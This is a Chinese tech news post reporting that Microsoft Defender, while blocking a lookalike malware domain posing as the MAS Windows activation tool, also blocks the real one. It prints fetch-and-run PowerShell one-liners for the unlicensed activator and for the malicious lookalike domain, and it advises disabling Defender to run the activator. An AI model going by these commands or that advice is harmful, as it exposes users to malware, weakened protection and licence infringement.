微軟封殺假 MAS 啟動工具時不慎將真 MAS 也封殺,現在用戶若要執行指令啟動需要先停用 Windows 10/11 安全防護功能。有網友發布的截圖顯示,在執行啟動命令時被微軟攔截,顯示木馬病毒 FakeMas,這應該是最近有人註冊類似域名投毒引起微軟關注後添加的攔截規則,但問題是真 MAS 也被攔截。
微軟顯然也知道 MAS 線上啟動工具,看起來微軟也同樣知道有駭客註冊類似網域發布虛假的 MAS 啟動工具來傳播惡意軟體,所以微軟透過 Microsoft Defender 自動攔截虛假的 MAS 啟動工具。
然而不幸的是微軟在處理規則時似乎出現意外,因為真正的 MAS 激活工具現在同樣被攔截,這導致用戶在 PowerShell 中執行激活命令時將會因為被攔截而直接報錯。
那怎麼知道微軟不是有意要封鎖真的 MAS 啟動工具呢?在 Microsoft Defender 攔截記錄裡,微軟提到的名稱是 Trojan:PowerShell/FakeMas.DA!MTB
考慮到關於虛假 MAS 啟動工具是最近才出現的並且 MAS 開發團隊也在 X/Twitter 上公佈了這件事,再加上微軟的攔截動作也是近期開始的,這基本可以判斷微軟壓根沒想著攔截真正的 MAS 激活工具。
只是正版和惡意軟體版僅在域名商有個字母的差異:
# 真正的 MAS 啟動工具指令如下
irm https://get.activated.win | iex
# 攜帶病毒的假版網域後少了個 d
irm hxxps://get.activate.win | iex
微軟在處理攔截規則時應該是不慎將真正的 MAS 激活工具域名給攔截了,手頭暫時沒有虛擬機沒法測試,不然藍點網高低得試試釣魚版是否被成功攔截,千萬別是微軟攔截錯了放行釣魚版把真正的 MAS 激活工具給攔截了。
現在擺在使用者面前的問題是,Microsoft Defender 預設情況是開啟的,因此使用者在執行啟動指令前必須先進入安全中心停用此安全防護,待成功啟動後再開啟各種安全防護即可。
這裡還需要再次強調請執行啟動指令時一定要認準域名,不然關閉防護的同時還執行釣魚版激活命令那系統可能就會被安裝惡意軟體,後續可能會造成資料外洩等安全問題。
